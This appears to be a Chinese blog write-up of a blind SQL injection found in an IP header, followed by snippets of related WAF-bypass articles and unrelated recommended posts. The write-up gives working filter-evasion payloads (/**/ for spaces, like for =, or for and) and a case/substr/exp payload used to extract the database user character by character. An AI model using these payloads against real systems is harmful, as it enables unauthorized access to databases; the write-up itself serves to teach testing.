这个注入挺特殊的,是ip头注入。我们进行简单的探测:
首先正常发起一次请求,我们发现content-type是76
探测注入我习惯性的一个单引号:
一个单引号我发现长度还是76
我开始尝试单引号,双引号一起:
我失败了长度还是76
一般sql注入输入单引号一般长度都会有些变化。
我记录深入探测,我输入'--%20
返回了200,并且长度是0,这让我产生了一丝好奇。这里很有可能存在注入哦。
我继续探测:
输入--%20
嘶!我不禁开始怀疑这里是不是本身就不存在安全问题呢?
我都感觉像是数字类型了,很显然不是。。因为假设是数字类型注入输入'--%20会报错。
那么究竟是什么问题呢?我觉得应该是过滤了注释符。过滤了--%20
我开始换一种方式进行探测:
我尝试输入'%20and%20'1'='1
返回200,长度为空,并且没有报false的提示,我觉得有戏,我尝试输入'%20and%20'1'='2
输出都一样。。。太坑了吧,这里我猜测可能过滤了and,也有可能过滤了空格
我们先把空格用+代替显示:
输入:'+and+'1'='1
返回长度还是76,继续输入:
'+and+'1'='2
没任何变化。好了+号测试了不行,我们试试还有啥方法可以代替空格?
输入'/**/and/**/'1'/**/=/**/'1:
返回长度76,继续输入:
'/**/and/**/'1'/**/=/**/'2
返回长度还是76。。没任何变化。
现在测试了三种方法,那么这里继续推测1.可能过滤了and 2.可能过滤了=号
基于这两种过滤,我开始尝试把and 替换成or,把=替换成/**/
再进行输入新的payload:
'/**/or/**/'1'/**/like/**/'1
oh!我感觉我有希望了,他终于返回了不一样的结果,接下来继续探测:
输入:'/**/or/**/'1'/**/like/**/'2
返回长度76,至此我可以很确认这是个sql注入。
现在我们在理清下思路:
1.使用like代替=
2.使用/**/代替空格
3.使用or代替and
然后我们构造如下payload进行探测数据库user:
'/***/OR/****/1/****/like/****/case/****/when/****/substr(user,1,1)/**/Like/***/'a'/**/then/**/1/****/else/****/exp(1111)/**/end/***/and/**/ '1'='1
成功遍历出数据库第一位是J:
然后我们依次往下遍历就是了就能得到完整的user内容。
简单的演示下整个注入的过程。
这次遇到的注入让我知道了,坚持就是胜利!
WEB安全番外第五篇--关于使用通配符进行OS命令注入绕WAF
一.通配符简介: 一般来讲,通配符包含*和?,都是英文符号,*用来匹配任意个任意字符,?用来匹配一个任意字符. 举个例子使用通配符查看文件,可以很名下看到打卡的文件是/etc/resolv.conf: ...
SQL注入绕WAF总结
0x00 前言 在服务器客户端领域,曾经出现过一款360主机卫士,目前已停止更新和维护,官网都打不开了,但服务器中依然经常可以看到它的身影.从半年前的测试虚拟机里面,翻出了360主机卫士Apache版 ...
绕WAF&;安全狗新姿势
俗话说只要思路宽,绕狗绕的欢.前段时间我有尝试着用以下的方法绕狗,效果还不错.不过这方法呢也许这段时间可以绕过,过段时间可能就失效了,大家还是要多去尝试找到更多的方法. 举例-->整型注入 绕过 ...
Burpsuit分块传输插件绕WAF原理和技巧(转)
0x00 原理 给服务器发送payload数据包,使得waf无法识别出payload,当apache,tomcat等web容器能正常解析其内容.如图一所示 0x02 实验环境 本机win10+x ...
【ORACLE】记录通过执行Oracle的执行计划查询SQL脚本中的效率问题
记录通过执行Oracle的执行计划查询SQL脚本中的效率问题 问题现象: STARiBOSS5.8.1R2版本中,河北对帐JOB执行时,无法生成发票对帐文件. 首先,Quartz表达式培植的启 ...
【转载】犀利的 oracle 注入技术
介绍一个在web上通过oracle注入直接取得主机cmdshell的方法. 以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTEN ...
Oracle注入之带外通信
Oracle注入之带外通信和DNSLOG注入非常相似,例如和mysql中load_file()函数实现无回显注入非常相似. 下面介绍这个技术中常用的函数和使用. 环境这里准备两台测试,一台注入点的靶机 ...
深入理解SQL注入绕过WAF和过滤机制
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...
深入了解SQL注入绕过waf和过滤机制
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...
随机推荐
MFC中控件的TAB顺序 ----转载
在MFC中添加控件后,按Ctrl+d可以改变控件TAB顺序,怕自己忘了,一个神奇的东西,记下. 关于改变Tab顺序的方法有以下几种: 方法一:在动态创建控件的时候STYLE设置成为WS_CHILD|W ...
phpmailer 的使用
[转载]http://blog.csdn.net/liruxing1715/article/details/7914974 <?php header('Content-Type:text/htm ...
写给Java开发者的Node.JS简介
前言 今天上推特看见这篇文章,点进去发现是新货. 正好最近想入Node的坑,又有一些Java基础,所以希望翻译出来给大家,同时也让自己加深理解. 才疏学浅,如有不妥之处请指正. 原文链接:Node f ...
ubuntu下安装rubymine
1.安装jdk 先查看系统有没有安装jdk,打开终端,输入以下命令: java -version 如果没有安装,在联网的环境下执行: $ -jdk 2.安装rubymine 从官网(http://ww ...
mysql中使用show table status 查看表信息
本文导读:在使用mysql数据库时,经常需要对mysql进行维护,查询每个库.每个表的具体使用情况,Mysql数据库可以通过执行SHOW TABLE STATUS命令来获取每个数据表的信息. 一.使用 ...
【原】无脑操作:Windows下搭建Kafka运行环境
Kafka是一种高吞吐量的分布式发布订阅消息系统 1.优点:① 通过磁盘数据结构提供消息的持久化,这种结构对于即使数以TB的消息存储也能够保持长时间的稳定性能.② 高吞吐量:即使是非常普通的硬件Kaf ...
c/c++ 网络编程 UDP up/down 网卡
网络编程 UDP up/down 网卡 在程序里动态改变网卡的状态.注意:程序运行需要root权限. 程序运行的方法: sudo ./a.out 1,关闭网卡 #include
ASP.NET MVC缓存使用
局部缓存(Partial Page) 1.新建局部缓存控制器: public class PartialCacheController : Controller { // GET: /PartialC ...
0.3 CMD常用命令!以及用CMD显得自己高大上
CMD是大家熟知的Windows命令提示符(cmd.exe),它是 Windows NT 下的一个用于运行 Windows 控制面板程序或某些 DOS 程序的shell程序. CMD命令快捷键是:wi ...
1450
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
